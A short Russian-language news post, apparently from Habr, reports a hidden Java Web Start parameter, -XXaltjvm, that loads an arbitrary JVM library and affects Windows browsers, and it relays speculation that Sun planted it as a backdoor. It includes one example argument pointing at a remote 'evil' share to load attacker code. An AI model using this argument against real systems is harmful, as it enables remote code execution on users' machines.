Как стать автором
Поиск
Написать публикацию
Обновить

В JavaWS нашли бэкдор

Время на прочтение1 мин
Количество просмотров1K
Во фреймворке Java Web Start найдена серьёзная уязвимость, а именно скрытый параметр -XXaltjvm (а также -J-XXaltjvm), с помощью которого можно запускать альтернативную версию библиотеки JavaVM (jvm.dll или libjvm.so), расположенную в любом месте. То есть можно прямо сейчас исполнить команду вида -XXaltjvm=\\IP\evil, и тушите свет на любой Windows-машине.

Поскольку JavaWS является частью JRE, то уязвимость затрагивает все основные браузеры, включая Opera, Firefox, IE, Chrome и т.д. В данный момент уязвимость присутствует только в версиях под Windows, тогда как в Java SE 6 она закрыта несколько релизов назад.

По мнению специалистов, которые подробно документировали данную уязвимость, она присутствует в JavaWS уже очень давно, как минимум несколько лет. Высказываются даже странные подозрения, что кто-то в Sun внедрил эту «фичу» специально в каких-то целях, уж слишком похоже на сознательно спроектированный бэкдор.
Теги:
Хабы:
Всего голосов 63: ↑54 и ↓9+45
Комментарии31

Публикации

Ближайшие события